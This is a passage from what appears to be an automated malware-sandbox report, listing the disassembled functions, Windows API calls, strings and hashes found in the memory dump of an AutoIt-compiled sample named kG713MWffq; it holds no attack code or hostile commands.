                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                        • String ID: @EXITCODE
                                                                                        • API String ID: 2734553683-3436989551
                                                                                        • Opcode ID: f269a4cbd32343e6f421fefd5587bc27b694718d98178b64f66077375e62c2a6
                                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                        • Opcode Fuzzy Hash: f269a4cbd32343e6f421fefd5587bc27b694718d98178b64f66077375e62c2a6
                                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend_mallocwsprintf
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 1262938277-328681919
                                                                                        • Opcode ID: ca481e77b96886376af8447e84e4816480923f84b4c644cc7985f328c9dd036e
                                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                        • Opcode Fuzzy Hash: ca481e77b96886376af8447e84e4816480923f84b4c644cc7985f328c9dd036e
                                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                        APIs
                                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                        • String ID: aeB
                                                                                        • API String ID: 857135153-906807131
                                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D